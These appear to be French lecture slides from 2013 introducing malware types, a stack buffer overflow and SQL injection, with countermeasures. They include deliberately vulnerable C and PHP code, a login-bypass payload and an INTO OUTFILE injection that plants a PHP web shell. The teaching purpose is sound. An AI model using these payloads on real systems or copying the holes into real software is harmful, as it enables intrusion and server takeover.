Cours Licence AESR - UDA - 2013

1. c0r3war at gmail dot com - 2013

2. C'est quoi un malware?
Malware
=
MALicious softWARE

3. Typologie (1)
Malware
Virus
Worm
Trojan
Backdoor
Spyware
Adware
Ransomware
Rootkits

4. Typologie (2)
Malwares
Backdoor
Spyware
Adware
Ransomware
Rootkits
Virus
Trojan
Worm Botnets

5. Quelques célébrités
Core War (1960)
Brain (1986)
Melissa (1999)
I Love You (2000)
Nimda (2001)
Blaster (2003)
Zeus (2007)
Conficker (2008)
Stuxnet (2010)
Flame (2012)

6. Système
compromisExploitation
Conditions necessaires
Cible
Motivationou
Menace
Vulnérabilité

7. Motivations
Challenge
Reconnaissance
Volontédenuire
(gratuite)
Fraude/volde
données
CyberWar
Volontédenuire
(motivation
financière)
Professionalisation

8. Vulnérabilité
Définition
Caractéristique d'un asset qui constitue une
faiblesse ou une faille

9. Stack based buffer overflow
Code source
#include <string.h>
void bad_function (char *buffer)
{
char localString [128];
strcpy (localString, buffer);
}
void main (int argc, char **argv)
{
bad_function (argv[1]);
}

10. Stack based buffer overflow
La Pile
ESP -->
0xffffffff
0x00000000

11. Stack based buffer overflow
bad_function (argv[1])
ESP -->
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
MOV DWORD PTR [ESP], EAX
CALL bad_function
PUSH EBP
MOV EBP,ESP

12. Stack based buffer overflow
char localString [128];
EBP -->
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
ESP -->
SUB ESP,0x80
128
octets

13. AAAA
AAAA
AAAA
Stack based buffer overflow
strcpy (localString, buffer);
EBP -->
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
[EBP-0x80]
-->
argv [1] = 'AAAAAAAAAAAA'
MOV EAX, DWORD PTR [EBP+8]
PUSH EAX
LEA EAX, DWORD PTR [EBP-0x80]
PUSH EAX
CALL strcpy

14. Stack based buffer overflow
strcpy (localString, buffer);
EBP -->
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
argv [1] = 'AAA...AAA'
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[EBP-0x80]
-->

15. Stack based buffer overflow
strcpy (localString, buffer);
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
ESP -->
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
MOV ESP,EBP
POP EBP
RET 4
RET = BOOM
[EBP-0x80]
-->

16. AAAA
AAAA
AAAA
Stack based buffer overflow
exploitation
0xffffffff
0x00000000
pointeur vers argv[1]
EIP
EBP
ESP -->
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
@ retour
Shellcode
CALL ESP
0x90909090
NOP
NOP
NOP
NOP
[EBP-0x80]
-->

17. Stack based buffer overflow
Prévention
char* strncpy (char* dest, char* src, size-t num);
DEP
ASLR

18. SQL Injection
Définition
Vulnérabilité due à la mauvaise gestion du contenu
de variables utilisées pour construire une requête
SQL.
Mauvaise gestion des caractères spéciaux
Mauvais typage des variables

19. SQL Injection
Objectifs
Login bypass
Modification de données dans la base
Deny of Service
Execution de code sur le serveur
Récupération/création/écrasement de fichiers...

20. <?php
$mysqli = mysqli_connect("127.0.0.1", "xxxx_user", "xxxx",
"xxxx");
if (mysqli_connect_errno($mysqli)) {
echo "Failed to connect to MySQL: " .
mysqli_connect_error();
}
$login = $_GET["login"];
$password = $_GET["password"];
$res = mysqli_query($mysqli,
"SELECT * from users where login='$login' and
password='$password';");
if ($res)
if ($res->num_rows) {
$row = mysqli_fetch_assoc($res);
echo "Hello {$row['name']}, your user ID is {$row
['login']}.<p>";
} else {
echo "Unknown user or bad password, login denied.";
}
?>;
SQL Injection
Exemple de code vulnérable

21. SQL Injection
La requête vulnérable
select * from users where
login='$login' and
password='$password';

22. SQL Injection
Ce qui facilite l'exploitation
$row = mysqli_fetch_assoc($res);
echo "Hello {$row['name']}, your user ID is
{$row['login']}.<p>";

23. SQL Injection
Test de vulnérabilité
select * from users where login='' or 1=1;
-- and password='MDP';
Paramètre Valeur
$login ' or 1=1; --
$password MDP

24. SQL Injection
Ecriture d'un fichier sur le disque
select * from users where login='' UNION
SELECT '<? system($_GET['c']); ?>', '',
'', '', '' INTO OUTFILE 'd:
xampphtdocsaesrshell.php' --
and password='MDP';
Paramètre Valeur
$login ' UNION SELECT '<? system($_GET
['c']); ?>', '', '', '', '' INTO
OUTFILE 'd:
xampphtdocsaesrshell.php' --
$password MDP

25. SQL Injection
Prévention
Escaping
en PHP: mysqli_real_escape_string ()
Prepared statements
en PHP: mysqli_prepare ()
Contrôle des paramètres passés à la requête
Gestion des droits dans la base de données
WAF (Web Application Firewall)

26. Contre mesures
Prévenir les attaques
Le concept de Defense in depth

27. Contre mesures
Préventives
Patch management
Vulnerability Assessment & Management
Limitation des services au strict minimum
Limitation des droits au strict minimum
Bon sens

28. Contre mesures
Curatives
Firewall et segmentation
WAF (Web Application Firewall)
IDS/IPS et HIPS
AV, anti malware, anti rootkits

29. Vulnerability assessment
Zoom sur une contre mesure
Outil permettant de determiner quelles sont les
vulnérabilités d'un système